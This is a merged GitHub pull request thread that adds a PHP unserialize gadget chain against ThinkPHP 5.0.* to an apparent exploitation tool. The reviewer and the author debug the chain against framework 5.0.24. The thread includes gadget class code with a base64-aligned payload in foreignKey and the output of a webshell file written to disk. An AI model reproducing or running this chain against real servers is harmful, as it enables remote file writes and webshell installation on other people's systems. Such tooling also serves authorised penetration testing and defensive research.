### PR TITLE
add thinkphp5.0.* unserialize chain

### PR DESCRIPTION
**Pull request by zhcy2018**
Add thinkphp5.0.* unserialize chain.
If there are any problems, you can contact me through e-mail (980514750@qq.com)

### CODE REVIEW

**Comment by cfreal** [comment]
Hello zhcy2018,

I can't seem to make it work. I get:

```
PHP Warning:  Uncaught Error: Call to undefined method think\cache\driver\Memcached::close() in /tmp/k/framework-5.0.24/library/think/session/driver/Memcache.php:70
```

I've gone through the code and your payload as well, and it looks like that's what should happen...
FYI, I downloaded framework-5.0.24 from https://github.com/top-think/framework to test this.

Can you walk me through your testing process ?
Cheers

**Comment by zhcy2018** [comment]
Hello, sure there is  an error occurred, but this doesn't affect writing the shell. I just tested  in windows, here is the result




Also, I write an article about the chain, you can read it from here https://www.anquanke.com/post/id/251318

**Comment by zhcy2018** [comment]
it also works well on Linux(I test it on docker), though an error occurs.
test4
test5

**Comment by cfreal** [comment]
Oh, my bad: I mistook the `Output::writeln()` call for a `print()` for some reason, so I expected it to do nothing.
Really nice payload :) I'll fix a few codestyle things and push it !

Great job !

**Comment by cfreal** [comment]
@zhcy2018 : We could have arbitrary content by base64-encoding `foreignKey`, like so:

```php
    class HasMany extends Relation
    {
        protected $parent;
        protected $localKey = 'a';
        protected $foreignKey = 'AAA' . 'aGVsbG87IHRoaXMgaXMgYSBzaGVsbCgpOyAg';
        protected $pivot;
    }

    class Memcached
    {
        protected $tag;
        protected $options;
        protected $handler;
    
        public function __construct()
        {
            $this->tag = true;
            $this->options = [
                'expire'   => 0,
                'prefix'   => '',
            ];
            $this->handler = new File();
        }
    }
```

```php
base64_encode('aGVsbG87IHRoaXMgaXMgYSBzaGVsbCgpOyAg')
== 'hello; this is another shell();  '
```

The payload just needs to be base64-aligned (a multiple of 3).
Then, I get:

```
# cat 3b58a9545013e88c7186db11bb158c44.php 
���M4�M4�M4��b�ζ��xhello; this is another shell();  ^�
```

Right ?

**Comment by zhcy2018** [comment]
Yes, great idea, I test in thinkphp5.0.24, and it works as well.

**Comment by zhcy2018** [comment]
Also, I think your payload is better than mine, since the filename will not change as the base64-encoding data changes

**Comment by zhcy2018** [comment]
Thanks for your advice , I just update the chain to make it easier to use.

**Comment by cfreal** [comment]
There was a problem when we added a string of size >= 100: since the string is serialized, we had something like:

```
s:120:"<query>AAAtoto"
              --- padding (wrong)
```

Now the padding is automatically calculated. Can you try and tell me if it works for you ? Looks good to me.

**Comment by zhcy2018** [comment]
My bad, I haven't noticed that. Your method works well(I test it on thinkphp5.0.24, writing 105 or 1550  bytes of 'a' correctly)

**Pull request merged**
